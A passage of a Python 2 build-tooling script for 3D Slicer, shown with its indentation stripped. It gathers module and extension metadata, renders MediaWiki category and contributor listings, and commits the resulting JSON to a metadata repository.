return {name: modulesMetadata[name]['categories'] for name in modulesMetadata}
#---------------------------------------------------------------------------
def getExtensionCategories(files):
import SlicerWizard as sw
print("\nCollecting extension 'categories'")
categories = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
categories[name] = []
if hasattr(desc, 'category') and desc.category.strip():
categories[name] = [desc.category]
return categories
#---------------------------------------------------------------------------
def _appendToDictValue(dict_, key, value, allowDuplicate=True):
if key not in dict_:
dict_[key] = []
append = True
if not allowDuplicate and value in dict_[key]:
append = False
if append:
dict_[key].append(value)
#---------------------------------------------------------------------------
def parseContributors(name, contributors):
# XXX This has been copied from [1]
# [1] https://github.com/Slicer/Slicer/blob/a8a01aa29210f938eaf48bb5c991681c3c67632d/Modules/Scripted/ExtensionWizard/ExtensionWizardLib/EditExtensionMetadataDialog.py#L101
def _parseIndividuals(individuals):
# Clean inputs
individuals = individuals.replace("This tool was developed by", "")
# Split by ',' and 'and', then flatten the list using itertools
individuals=list(itertools.chain.from_iterable(
[individual.split("and") for individual in individuals.split(",")]))
# Strip spaces and dot from each individuals and remove empty ones
individuals = filter(None, [individual.strip().strip(".") for individual in individuals])
return individuals
def _parseOrganization(organization):
try:
c = organization
c = c.strip()
n = c.index("(")
individuals = _parseIndividuals(c[:n].strip())
organization = c[n+1:-1].strip()
except ValueError:
individuals = _parseIndividuals(organization)
organization = ""
return (organization, individuals)
def _parseContributors(contributors):
orgs = re.split("(?<=[)])\s*,", contributors)
for c in orgs:
c = c.strip()
if not c:
print(" {0}: no contributors".format(name))
continue
(organization, individuals) = _parseOrganization(c)
for individual in individuals:
if individual == "":
print(" {0}: organization {1} has no individuals".format(name, organization))
continue
_appendToDictValue(orgToIndividuals, organization, individual)
_appendToDictValue(individualToOrgs, individual, organization)
orgToIndividuals = {}
individualToOrgs = {}
# Split by organization
if isinstance(contributors, basestring):
contributors = [contributors]
for contributor in contributors:
_parseContributors(contributor)
return (orgToIndividuals, individualToOrgs)
#---------------------------------------------------------------------------
def getExtensionContributors(files):
import SlicerWizard as sw
print("\nCollecting extension 'contributors'")
contributors = {}
for file_ in files:
desc = sw.ExtensionDescription(filepath=file_)
name = extractExtensionName(file_)
if not hasattr(desc, 'contributors'):
print(" skipping %s: missing contributors field" % name)
continue
contributors[name] = desc.contributors
return contributors
#---------------------------------------------------------------------------
def getModuleContributors(modulesMetadata):
print("\nCollecting module 'contributors'")
return {name: modulesMetadata[name]['contributors'] for name in modulesMetadata}
#---------------------------------------------------------------------------
def getContributingOrganizationsAndIndividuals(itemContributors):
organizationItems = {}
individualItems = {}
itemOrganizations = {}
individualOrganizations = {}
for itemName, contributors in itemContributors.iteritems():
(orgToIndividuals, individualToOrgs) = parseContributors(itemName, contributors)
for organization in orgToIndividuals.keys():
_appendToDictValue(organizationItems, organization, itemName)
itemOrganizations[itemName] = orgToIndividuals
for individual in individualToOrgs.keys():
_appendToDictValue(individualItems, individual, itemName)
orgs = individualToOrgs[individual]
for org in orgs:
if org:
_appendToDictValue(individualOrganizations, individual, org, allowDuplicate=False)
return (organizationItems, individualItems, itemOrganizations, individualOrganizations)
#---------------------------------------------------------------------------
def sortKeys(dict_, prettifyKey=False):
"""Return list of sorted dictionnary keys.
"""
def _updateKey(s):
s = s.lower()
if prettifyKey:
s = prettify(s)
return s
return sorted(dict_, key=_updateKey)
#---------------------------------------------------------------------------
def sortPrettifiedKeys(dict_):
"""Return list of sorted dictionnary keys.
"""
return sortKeys(dict_, prettifyKey=True)
#---------------------------------------------------------------------------
def generateContributorsWikiLinks(extensionName, organizations):
for org in sortPrettifiedKeys(organizations):
orgLink = "[[#{}|{}]]".format(org, org)
for individual in sortPrettifiedKeys(organizations[org]):
individualLink = "[[#{}|{}]]".format(individual, individual)
#---------------------------------------------------------------------------
def tocEntryAsWikiListItem(name, level=0, anchor=None, extras=[]):
return linkAsWikiListItem(
wikiPageToWikiLink('#' + convertTitleToWikiAnchor(name if anchor is None else anchor), prettify(name)),
level, extras)
#---------------------------------------------------------------------------
def individualEntryAsWikiListItem(name, level=0):
extras = []
individualOrganizations = cacheEntry("individualOrganizations")
if name in individualOrganizations:
if individualOrganizations[name]:
extras.append(individualOrganizations[name][0])
return tocEntryAsWikiListItem(name, level, extras=extras)
#---------------------------------------------------------------------------
def headerForWikiList(title, teaser):
lines = []
lines.append(u"= {} =".format(title))
lines.extend(teaser)
return lines
#---------------------------------------------------------------------------
def linkAsWikiListItem(link, level=0, extras=[]):
wikilink = link
if isinstance(link, dict):
wikilink = link['wikilink']
extraTxt = " <small>({})</small>".format(", ".join(extras)) if extras else ""
return "{0} {1}{2}".format("*"*(level+1), wikilink, extraTxt)
#---------------------------------------------------------------------------
def footerForWikiList(title, teaser):
return []
#---------------------------------------------------------------------------
def moduleLinkAsListItem(link, level=0):
name = link['name']
extras = []
moduleTypes = cacheEntry("moduleTypes")
moduleExtensions = cacheEntry("moduleExtensions")
if name in moduleExtensions:
extensionName = moduleExtensions[name]
extensionLinks = cacheEntry("extensionLinks")
# type (cli, loadable, scripted)
extras.append(moduleTypes[name])
# provenance (built-in or extension)
if extensionName in extensionLinks:
extras.append("bundled in {} extension".format(extensionLinks[extensionName]['wikilink']))
elif extensionName == 'builtin':
extras.append("built-in")
return linkAsWikiListItem(link, level, extras)
#---------------------------------------------------------------------------
linksAsWikiList = (headerForWikiList, linkAsWikiListItem, footerForWikiList)
# #---------------------------------------------------------------------------
# def headerForWikiTable():
# pass
#
# #---------------------------------------------------------------------------
# def linkAsWikiTableEntry():
# pass
#
# #---------------------------------------------------------------------------
# def headerForWikiTable():
# pass
#---------------------------------------------------------------------------
# linksAsWikiTable = (headerForWikiTable, linkAsWikiTableEntry, headerForWikiTable)
#---------------------------------------------------------------------------
def itemByCategoryToWiki(what, links, categories, linksRenderer=linksAsWikiList,
tocEntryRenderer=tocEntryAsWikiListItem, withToc=False):
def _traverse(categories, lines, categoryCallback,
itemCallback=None,
category=None, completeCategory=None,
level=-1,
lookup=lambda item:item):
if category:
categoryAnchor = sectionAnchor + '_' + convertTitleToWikiAnchor(completeCategory)
lines.append(categoryCallback(category, level, categoryAnchor))
if itemCallback and '_ITEMS_' in categories:
for item in categories['_ITEMS_']:
lines.append(itemCallback(lookup(item)))
for subcategory in sortKeys(categories):
if subcategory == '_ITEMS_':
continue
level = level + 1
_traverse(categories[subcategory], lines, categoryCallback,
itemCallback=itemCallback,
category=subcategory,
completeCategory=subcategory if category is None else category + '_' + subcategory,
level=level, lookup=lookup)
level = level - 1
title = "{0} by category".format(what)
print("\nGenerating '%s' section" % title)
sectionAnchor = convertTitleToWikiAnchor(title)
teaser = []
if withToc:
teaser.append("{} categories:".format(len(categories)))
_traverse(categories, teaser, tocEntryRenderer)
else:
teaser.append("{} categories".format(len(categories)))
lines = []
lines.extend(headerForWikiList(title, teaser))
# content
_traverse(categories, lines,
lambda category, level, anchor:
u"<span id='{}'></span>\n".format(anchor) +
u"{0} {1} {0}".format("="*(level+2), category),
itemCallback=linksRenderer[1], lookup=lambda item:links[item])
return (title, '#' + sectionAnchor, lines)
#---------------------------------------------------------------------------
def itemByNameToWiki(what, links, linksRenderer=linksAsWikiList):
title = "{0} by name".format(what)
print("\nGenerating '{0}' section".format(title))
teaser = ["{0} {1}:".format(len(links), what.lower())]
lines = []
lines.extend(linksRenderer[0](title, teaser))
for name in sortPrettifiedKeys(links):
lines.append(linksRenderer[1](links[name]))
lines.extend(linksRenderer[2](title, teaser))
return (title, '#' + convertTitleToWikiAnchor(title), lines)
#---------------------------------------------------------------------------
def itemByPropertyToWiki(what, links, description, items,
linksRenderer=linksAsWikiList,
tocEntryRenderer=tocEntryAsWikiListItem, withToc=False):
title = "{0} by {1}".format(what, description)
print("\nGenerating '%s' section" % title)
teaser = []
if withToc:
teaser.append("{0} {1}s:".format(len(items), description))
for name in sortKeys(items):
if not name or len(items[name]) == 0:
continue
teaser.append(tocEntryRenderer(name))
else:
teaser.append("{0} {1}s".format(len(items), description))
lines = []
lines.extend(linksRenderer[0](title, teaser))
for item in sortKeys(items):
if item != "" and len(items[item]) > 0:
lines.append("== {} ==".format(item))
for name in sortPrettifiedKeys(items[item]):
if item == "":
print(u" skipping {0}: missing '{1}'".format(name, description))
continue
lines.append(linksRenderer[1](links[name]))
lines.extend(linksRenderer[2](title, teaser))
return (title, '#' + convertTitleToWikiAnchor(title), lines)
#---------------------------------------------------------------------------
def getMetadataFiles(prefix):
"""Return a list of files associated with ``prefix``.
"""
targetDir = getPackagesMetadataDataDirectory()
print("\nScanning directory '{0}' using prefix '{1}'".format(targetDir, prefix))
files = glob.glob(os.path.join(targetDir, '{0}_*.json'.format(prefix)))
print("\nFound {0} file(s) matching prefix '{1}'".format(len(files), prefix))
for file in files:
print(" {}".format(file))
return files
#---------------------------------------------------------------------------
def _merge(a, b, path=None):
"Merge b into a"
# See http://stackoverflow.com/a/7205107/1539918
if path is None: path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
_merge(a[key], b[key], path + [str(key)])
elif isinstance(a[key], list) and isinstance(b[key], list):
a[key] = list(set(a[key] + b[key]))
elif a[key] == b[key]:
pass # same leaf value
else:
raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))
else:
a[key] = b[key]
return a
#---------------------------------------------------------------------------
def mergeMetadataFiles(prefix):
"""Return a merged dictonnary of all metadata files associated with ``prefix``.
"""
#-----------------------------------------------------------------------
def _readJson(filePath):
with codecs.open(filePath, 'r', 'utf-8') as fileContents:
return json.load(fileContents)
return reduce(_merge, [_readJson(filePath) for filePath in getMetadataFiles(prefix)])
#---------------------------------------------------------------------------
def cloneRepository(git_url, repo_dir, branch='master'):
"""Clone ``git_url`` into ``repo_dir`` and return a reference to it.
If a clone already exists, local change are discarded and ``branch``
is checked out. Then, a reference to the clone is returned.
"""
if not os.path.isdir(repo_dir):
git.Repo.clone_from(git_url, repo_dir)
print("Cloned '{0}' into '{1}'".format(git_url, repo_dir))
repo = git.Repo(repo_dir)
print("\nFound '{0}' in '{1}'".format(git_url, repo.working_dir))
checkoutBranch(repo, branch)
return repo
#---------------------------------------------------------------------------
def checkoutBranch(repo, branch):
"""Discard local ``repo`` changes, fetch remote changes and checkout
``branch``.
"""
print("\nDiscarding local changes in '{}'".format(repo.working_dir))
# Discard local changes
repo.git.reset('--hard','HEAD')
# Fetch changes
origin = repo.remotes.origin
print("\nFetching changes from '{}'".format(origin.url))
origin.fetch()
# Checkout branch and update branch
repo.git.checkout(branch)
print("\nApplying changes")
repo.git.reset('--hard','origin/{}'.format(branch))
#---------------------------------------------------------------------------
SLICER_PACKAGES_METADATA_GIT_URL = 'git@github.com:Slicer/slicer-packages-metadata'
SLICER_EXTENSIONS_INDEX_GIT_URL = 'git://github.com/Slicer/ExtensionsIndex'
#---------------------------------------------------------------------------
def getPackagesMetadataTopLevelDirectory():
return os.path.join(tempfile.gettempdir(), 'slicer-packages-metadata')
#---------------------------------------------------------------------------
def getPackagesMetadataDataDirectory():
metadataDir = os.path.join(getPackagesMetadataTopLevelDirectory(), 'metadata')
if not os.path.exists(metadataDir):
os.makedirs(metadataDir)
return metadataDir
#---------------------------------------------------------------------------
def getExtensionsIndexTopLevelDirectory():
return os.path.join(tempfile.gettempdir(), 'slicer-extensions-index')
#---------------------------------------------------------------------------
def getModuleLinks(wikiName, modulesMetadata, slicerVersion=None):
moduleLinks = \
generateItemWikiLinks('Modules', wikiName,
{name:"" for name in modulesMetadata.keys()}, slicerVersion)
return moduleLinks
#---------------------------------------------------------------------------
def getExtensionLauncherAdditionalSettingsFromBuildDirs(slicerExtensionsIndexBuildDir):
launcherSettingsFiles = []
for dirname in os.listdir(slicerExtensionsIndexBuildDir):
extensionBuildDir = os.path.join(slicerExtensionsIndexBuildDir, dirname)
if os.path.isdir(extensionBuildDir):
if dirname.endswith('-build'):
launcherSettings = getExtensionLauncherSettings(extensionBuildDir)
if launcherSettings is not None:
launcherSettingsFiles.append(launcherSettings)
return launcherSettingsFiles
#---------------------------------------------------------------------------
def _readLauncherSettings(settingsFile):
"""This function read the given ``settingsFile``, trim all lines
and return the corresponding buffer.
.. note::
This function is needed for Slicer < r24174. For new version of Slicer,
the settings generation has been fixed.
"""
updatedFileContents = []
with open(settingsFile) as fileContents:
for line in fileContents:
updatedFileContents.append(line.lstrip().rstrip('\n'))
return '\n'.join(updatedFileContents)
#---------------------------------------------------------------------------
def readAdditionalLauncherSettings(settingsFile, configs):
"""Read ``settingsFile`` and populate the provided ``configs`` dictionnary.
"""
parser = ConfigParser.ConfigParser()
settingsFileContents = _readLauncherSettings(settingsFile)
parser.readfp(io.BytesIO(settingsFileContents))
for section in ['LibraryPaths', 'Paths', 'PYTHONPATH', 'QT_PLUGIN_PATH']:
if not parser.has_section(section):
continue
if section not in configs:
configs[section] = []
for idx in range(parser.getint(section, 'size')):
configs[section].append(parser.get(section, '{0}\\path'.format(idx+1)))
#---------------------------------------------------------------------------
def writeLauncherAdditionalSettings(outputSettingsFile, configs):
"""Write ``outputSettingsFile`` using provided ``configs`` dictionnary.
"""
with open(outputSettingsFile, 'w') as fileContents:
def _writeSection():
fileContents.write('[{0}]\n'.format(section))
items = configs[section]
size = len(items)
for idx in range(size):
fileContents.write('{0}\\path={1}\n'.format(idx+1, items[idx]))
fileContents.write('size={0}\n'.format(size))
for section in configs:
_writeSection()
fileContents.write('\n')
#---------------------------------------------------------------------------
def mergeExtensionsLauncherAdditionalSettings(slicerExtensionsIndexBuildDir):
mergedSettingsFile = getPackagesMetadataTopLevelDirectory() + "AdditionalLauncherSettings.ini"
print("\nCreating {0}".format(mergedSettingsFile))
# Read extension launcher additional settings
settingsFiles = getExtensionLauncherAdditionalSettingsFromBuildDirs(slicerExtensionsIndexBuildDir)
configs = {}
for settingsFile in settingsFiles:
readAdditionalLauncherSettings(settingsFile, configs)
# Write common launcher additional settings
writeLauncherAdditionalSettings(mergedSettingsFile, configs)
return mergedSettingsFile
#---------------------------------------------------------------------------
def getSlicerLauncher(slicerBuildDir):
launcher = os.path.join(slicerBuildDir, _e('Slicer'))
if not os.path.exists(launcher):
return None
return launcher
#---------------------------------------------------------------------------
def _e(name):
"""Append the executable suffix corresponding to the platform running
this script.
"""
return name if not sys.platform.startswith('win') else name + '.exe'
#---------------------------------------------------------------------------
def installPip(slicerBuildDir=None):
url = 'https://bootstrap.pypa.io/get-pip.py'
filePath = os.path.basename(url)
print("\nDownloading '{0}' into '{1}'".format(url, filePath))
response = urllib2.urlopen(url)
with open(filePath, "wb") as fileContents:
fileContents.write(response.read())
# XXX See https://github.com/commontk/AppLauncher/issues/57
pythonExecutable = _e('python')
if sys.platform == 'darwin':
pythonExecutable = os.path.join(slicerBuildDir, '../python-install/bin/python')
print("\nInstalling pip")
slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--launch', pythonExecutable, filePath])
#---------------------------------------------------------------------------
def runPip(args, slicerBuildDir=None):
def _runPip():
print("\npip {0}".format(" ".join(args)))
slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--launch', _e('pip')] + args)
try:
_runPip()
except RuntimeError:
installPip(slicerBuildDir)
_runPip()
#---------------------------------------------------------------------------
def slicerLauncherPopen(launcher, args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs):
if launcher is None:
args.pop(0) # Ignore '--launch' argument
print("\nStarting {0}".format(" \\\n ".join(args)))
else:
print("\nStarting {0} {1}".format(launcher, " \\\n ".join(args)))
p = subprocess.Popen([launcher] + args, stdout=stdout, stderr=stderr, **kwargs)
ec = p.wait()
if ec:
raise RuntimeError, "Calling {0} failed (exit code {1})".format(launcher, ec)
return p
#---------------------------------------------------------------------------
def getSlicerVersion(slicerBuildDir):
p = slicerLauncherPopen(getSlicerLauncher(slicerBuildDir), ['--version'])
if p is None:
return None
version = p.stdout.read().strip() # Slicer X.Y.Z[-YYYY-MM-DD]
print("\nAuto-discovered version is '{0}' [major.minor:{1}, release:{2}]".format(
version,
getSlicerMajorMinorVersion(version),
isSlicerReleaseVersion(version)))
return version
#---------------------------------------------------------------------------
def getSlicerMajorMinorVersion(slicerVersion):
version = re.findall(r'^Slicer (\d\.\d)', slicerVersion)[0]
return version
#---------------------------------------------------------------------------
def isSlicerReleaseVersion(slicerVersion):
"""Return True if the given slicer version corresponds to a
Slicer release.
>>> isSlicerReleaseVersion('foo')
False
>>> [isSlicerReleaseVersion('Slicer {}'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[True, True, True]
>>> [isSlicerReleaseVersion('Slicer {}-2014-12-23'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-SomeText'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-A'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, False, False]
>>> [isSlicerReleaseVersion('Slicer {}-0'.format(v)) for v in ['4.4', '4.4.1', '4.4.1-3']]
[False, True, False]
"""
return re.match(r'^Slicer \d\.\d(\.\d(\-\d)?)?$', slicerVersion) is not None
#---------------------------------------------------------------------------
def getModuleDirectories(basePath, slicerMajorMinorVersion):
"""Recursively walk ``basepath`` directory and return the list of directory expected
to contain cli, scripted or loadable modules.
"""
output = []
for subdir in ['cli-modules', 'qt-loadable-modules', 'qt-scripted-modules']:
moduleDir = os.path.join(basePath, 'lib', 'Slicer-{0}'.format(slicerMajorMinorVersion), subdir)
if os.path.isdir(moduleDir):
output.append(moduleDir)
if os.path.isdir(basePath) and os.path.basename(basePath) not in ['_CPack_Packages']:
for dirname in os.listdir(basePath):
output.extend(getModuleDirectories(os.path.join(basePath, dirname), slicerMajorMinorVersion))
return output
#---------------------------------------------------------------------------
def getExtensionLauncherSettings(extensionBuildDir):
"""Recursively walk an extension build directory until a file named
`AdditionalLauncherSettings.ini` is found.
"""
for filename in os.listdir(extensionBuildDir):
filepath = os.path.join(extensionBuildDir, filename)
if filename == 'AdditionalLauncherSettings.ini':
return filepath
elif not os.path.isdir(filepath):
continue
else:
return getExtensionLauncherSettings(filepath)
#---------------------------------------------------------------------------
def isCLIExecutable(filePath):
import ctk_cli
result = ctk_cli.isCLIExecutable(filePath)
if not result:
return False
moduleName = extractCLIModuleName(filePath)
# for pattern in ['Test$']:
# if re.search(pattern, moduleName, flags=re.IGNORECASE) is not None:
# return False
return True
#---------------------------------------------------------------------------
def extractCLIModuleName(filePath):
name = os.path.basename(filePath)
if name.endswith('.exe'):
name = result[:-4]
return name
#---------------------------------------------------------------------------
def isLoadableModule(filePath):
return extractLoadableModuleName(filePath) is not None
#---------------------------------------------------------------------------
def extractLoadableModuleName(filePath):
# See qSlicerUtils::isLoadableModule
result = re.match("(?:libqSlicer(.+)Module\\.(?:so|dylib))|(?:(?!lib)qSlicer(.+)Module\\.(?:dll|DLL))", os.path.basename(filePath))
name = None
if result is not None:
name = result.group(1) if result.group(1) is not None else result.group(2)
return name
#---------------------------------------------------------------------------
def isScriptedModule(filePath):
isScript = os.path.splitext(filePath)[-1] == '.py'
if not isScript:
return False
moduleName = extractScriptedModuleName(filePath)
for pattern in ['Plugin', 'SelfTest', 'Test', '\d{4}', 'Tutorial']:
if re.search(pattern, moduleName, flags=re.IGNORECASE) is not None:
return False
return moduleName
#---------------------------------------------------------------------------
def extractScriptedModuleName(filePath):
return os.path.splitext(os.path.basename(filePath))[0]
#---------------------------------------------------------------------------
def _getModuleNames(tester, extractor, buildDir):
names = []
for path in os.listdir(buildDir):
filePath = os.path.join(buildDir, path)
if tester(filePath):
names.append(extractor(filePath))
return names
#---------------------------------------------------------------------------
def getCLIModuleNames(buildDir):
return _getModuleNames(isCLIExecutable, extractCLIModuleName, buildDir)
#---------------------------------------------------------------------------
def getLoadableModuleNames(buildDir):
return _getModuleNames(isLoadableModule, extractLoadableModuleName, buildDir)
#---------------------------------------------------------------------------
def getScriptedModuleNames(buildDir):
return _getModuleNames(isScriptedModule, extractScriptedModuleName, buildDir)
#---------------------------------------------------------------------------
def getModuleNamesByType(modulePaths):
"""Return a dictionnary of module types and associated module names
given a list of module paths.
.. note::
Module types are indentified using keys ``cli``, ``loadable`` and ``scripted``.
"""
results = {
'cli':[],
'loadable':[],
'scripted':[]
}
for path in modulePaths:
results['cli'].extend(getCLIModuleNames(path))
results['loadable'].extend(getLoadableModuleNames(path))
results['scripted'].extend(getScriptedModuleNames(path))
return results
#---------------------------------------------------------------------------
def getBuiltinModulesFromBuildDir(slicerBuildDir, slicerMajorMinorVersion=None):
"""Return list of Slicer built-in module.
"""
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
return getModuleNamesByType(getModuleDirectories(slicerBuildDir, slicerMajorMinorVersion))
#---------------------------------------------------------------------------
def getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion=None):
"""Return a dictionnary of extension names with corresponding module directories.
"""
data = {}
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
print("\nCollecting extension module directories")
for dirname in os.listdir(slicerExtensionsIndexBuildDir):
if os.path.isdir(os.path.join(slicerExtensionsIndexBuildDir, dirname)):
if dirname.endswith('-build'):
extensionName = dirname.replace('-build', '')
data[extensionName] = getModuleDirectories(os.path.join(slicerExtensionsIndexBuildDir, dirname), slicerMajorMinorVersion)
return data
#---------------------------------------------------------------------------
def getExtensionModulesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion=None):
"""Return a dictionnary of extension names with corresponding module names.
.. note::
Slicer built-in modules are associated with the special extension name ``builtin``.
See :func:`getBuiltinModulesFromBuildDir`
"""
if slicerMajorMinorVersion is None:
slicerMajorMinorVersion = getSlicerMajorMinorVersion(getSlicerVersion(slicerBuildDir))
data = {}
extensionModuleDirectories = getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion)
for extensionName, extensionModuleDirectory in extensionModuleDirectories.iteritems():
data[extensionName] = getModuleNamesByType(extensionModuleDirectory)
data['builtin'] = getBuiltinModulesFromBuildDir(slicerBuildDir, slicerMajorMinorVersion)
return data
#---------------------------------------------------------------------------
def getSlicerReleaseIdentifier(slicerVersion):
"""Return 'Nightly' if the given slicerVersion is *NOT* a release.
Otherwise return '<major>.<minor>'.
See :func:`isSlicerReleaseVersion`
"""
slicerMajorMinorVersion = getSlicerMajorMinorVersion(slicerVersion)
slicerRelease = isSlicerReleaseVersion(slicerVersion)
return ('Nightly' if not slicerRelease else slicerMajorMinorVersion)
#---------------------------------------------------------------------------
def outputFilePath(path, prefix, system=None, slicerVersion=None, withDate=False):
""" Return file name suffixed with platform name and optionally slicer
version and/or today's date::
<path>/<prefix>[_(X.Y|Nightly)]_(Linux|Darwin|Windows)[_YYYY-MM-DD].json
"""
version = ""
if slicerVersion:
version += "_" + getSlicerReleaseIdentifier(slicerVersion)
if system is None:
system = platform.system()
date = ""
if withDate:
date += "_" + datetime.date.today().isoformat()
fileName = '{0}{1}_{2}{3}.json'.format(prefix, version, system, date)
return os.path.join(path, fileName)
#---------------------------------------------------------------------------
def save(filePath, dictionnary):
"""Save dictionnary as a json file`
"""
with codecs.open(filePath, 'w', 'utf-8') as fileContents:
fileContents.write(
json.dumps(dictionnary, sort_keys=True, indent=4))
print("\nSaved '{}'".format(filePath))
return filePath
#---------------------------------------------------------------------------
def getLoadedModuleMetadata(module):
"""Return a dictionnary containing the module contributors and categories.
"""
metadata = {}
metadata['contributors'] = module.contributors
metadata['categories'] = module.categories
return metadata
#---------------------------------------------------------------------------
def getLoadedModulesMetadata():
"""Return a dictionnary containing contributors and categories for
all modules currently loaded in Slicer.
"""
import slicer
metadata = {}
moduleManager = slicer.app.moduleManager()
for moduleName in moduleManager.modulesNames():
metadata[moduleName] = getLoadedModuleMetadata(moduleManager.module(moduleName))
return metadata
#---------------------------------------------------------------------------
def getModulesMetadataFilePath(slicerVersion, system=None):
return outputFilePath(getPackagesMetadataDataDirectory(),
'slicer-modules-metadata', system=system, slicerVersion=slicerVersion)
#---------------------------------------------------------------------------
def saveLoadedModulesMetadata(slicerVersion):
"""Save metadata associated with modules loaded in Slicer.
"""
if not slicerVersion:
raise RuntimeError, "slicerVersion parameter is required"
save(getModulesMetadataFilePath(slicerVersion), getLoadedModulesMetadata())
slicer.app.quit()
#---------------------------------------------------------------------------
def _saveLoadedModulesMetadata(args):
saveLoadedModulesMetadata(slicerVersion=args.slicer_version)
#---------------------------------------------------------------------------
def getExtensionModulesFilePath(slicerVersion, system=None):
return outputFilePath(getPackagesMetadataDataDirectory(),
'slicer-extension-modules', system=system, slicerVersion=slicerVersion)
#---------------------------------------------------------------------------
def getExtensionModules(slicerVersion):
cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
return mergeMetadataFiles('slicer-extension-modules_{0}'.format(
getSlicerReleaseIdentifier(slicerVersion)))
#---------------------------------------------------------------------------
def getModuleTypes(extensionModules):
moduleTypes = {}
for extensionName, extensionModuleTypes in extensionModules.iteritems():
for moduleType, moduleNames in extensionModuleTypes.iteritems():
for moduleName in moduleNames:
moduleTypes[moduleName] = moduleType
return moduleTypes
#---------------------------------------------------------------------------
def getModuleExtensions(extensionModules):
moduleExtensions = {}
for extensionName, moduleTypes in extensionModules.iteritems():
for moduleType, moduleNames in moduleTypes.iteritems():
for moduleName in moduleNames:
moduleExtensions[moduleName] = extensionName
return moduleExtensions
#---------------------------------------------------------------------------
# def getModules(extensionModules):
# modules = {}
# for extensionName, moduleTypes in extensionModules.iteritems():
# for moduleType, moduleNames in moduleTypes.iteritems():
# for moduleName in moduleNames:
# #print([moduleName, extensionName, moduleType])
# modules[moduleName] = { 'extensionName' : extensionName,
# 'moduleType' : moduleType }
# return modules
#---------------------------------------------------------------------------
def saveAllExtensionsModulesMetadata(slicerBuildDir, slicerExtensionsIndexBuildDir,
updateGithub=True, slicerVersion=None):
try:
import ctk_cli
except ImportError:
runPip(['install', 'ctk_cli'], slicerBuildDir=slicerBuildDir)
import ctk_cli
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
slicerMajorMinorVersion = getSlicerMajorMinorVersion(slicerVersion)
# Clone repository
repo = cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
mergedSettingsFile = mergeExtensionsLauncherAdditionalSettings(slicerExtensionsIndexBuildDir)
launcherArgs = ['--launcher-additional-settings', mergedSettingsFile]
extensionModuleDirectories = \
getExtensionModuleDirectoriesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion).values()
# Flatten list
extensionModuleDirectories = [item for sublist in extensionModuleDirectories for item in sublist]
launcherArgs.append('--ignore-slicerrc')
# 2017-04-18 (Jc): Starting without mainwindow is not supported by some extensions
# and causes Slicer to crash.
# launcherArgs.append('--no-main-window')
launcherArgs.append('--python-script')
launcherArgs.append(os.path.realpath(__file__))
launcherArgs.append('save-loaded-modules-metadata')
launcherArgs.append('--slicer-version')
launcherArgs.append(slicerVersion)
if len(extensionModuleDirectories) > 0:
launcherArgs.append('--additional-module-paths')
launcherArgs.extend(extensionModuleDirectories)
launcher = getSlicerLauncher(slicerBuildDir)
p = slicerLauncherPopen(launcher, launcherArgs)
if p is None:
return None
print("\nSaved '{0}'".format(getModulesMetadataFilePath(slicerVersion)))
data = getExtensionModulesFromBuildDirs(slicerBuildDir, slicerExtensionsIndexBuildDir, slicerMajorMinorVersion)
save(getExtensionModulesFilePath(slicerVersion), data)
if updateGithub:
index = repo.index
index.add([getModulesMetadataFilePath(slicerVersion)])
index.add([getExtensionModulesFilePath(slicerVersion)])
msg = ("Update modules-metadata and modules-by-extension listings"
" on {0} platform for {1}".format(platform.system(), slicerVersion))
index.commit(msg)
print("\nCommit: {0}".format(msg))
repo.remotes.origin.push(repo.head)
print("\nPushed changed to '{0}'".format(SLICER_PACKAGES_METADATA_GIT_URL))
#---------------------------------------------------------------------------
def _saveAllExtensionsModulesMetadata(args):
if args.slicer_version is None:
args.slicer_version = getSlicerVersion(args.slicer_build_dir)
saveAllExtensionsModulesMetadata(
args.slicer_build_dir,
args.slicer_extension_index_build_dir,
updateGithub=not args.no_github_update,
slicerVersion=args.slicer_version)
#-----------------------------------------------------------------------
def _isRegularSection(title, anchor, content):
return title and anchor and content
#-----------------------------------------------------------------------
def _isRawSection(title, anchor, content):
return not title and not anchor and content
#-----------------------------------------------------------------------
def _isRawTocEntry(title, anchor, content):
return title and not anchor and not content
#-----------------------------------------------------------------------
def createRawSection(txt):
return (None, None, [txt])
#-----------------------------------------------------------------------
def createRawTocEntry(txt):
return (txt, None, None)
#-----------------------------------------------------------------------
def generateWikiToc(sections):
lines = []
lines.append('__NOTOC__')
for (title, anchor, content) in sections:
if _isRegularSection(title, anchor, content):
lines.append("* [[{0}|{1}]]".format(anchor, title))
elif _isRawTocEntry(title, anchor, content):
lines.append(title)
return lines
#-----------------------------------------------------------------------
def generateWikiSections(sections):
lines = []
for (title, anchor, content) in sections:
if _isRegularSection(title, anchor, content) or \
_isRawSection(title, anchor, content):
lines.extend(content)
return lines
#-----------------------------------------------------------------------
def thisScriptNameAndRev():
"""
:return: Script name and script revision.
:rtype: tuple
"""
scriptName = os.path.basename(__file__)
scriptRevision = None
try:
repo = git.Repo(os.path.dirname(__file__))
scriptRevision = repo.head.commit.hexsha[:7]
except:
pass
return (scriptName, scriptRevision)
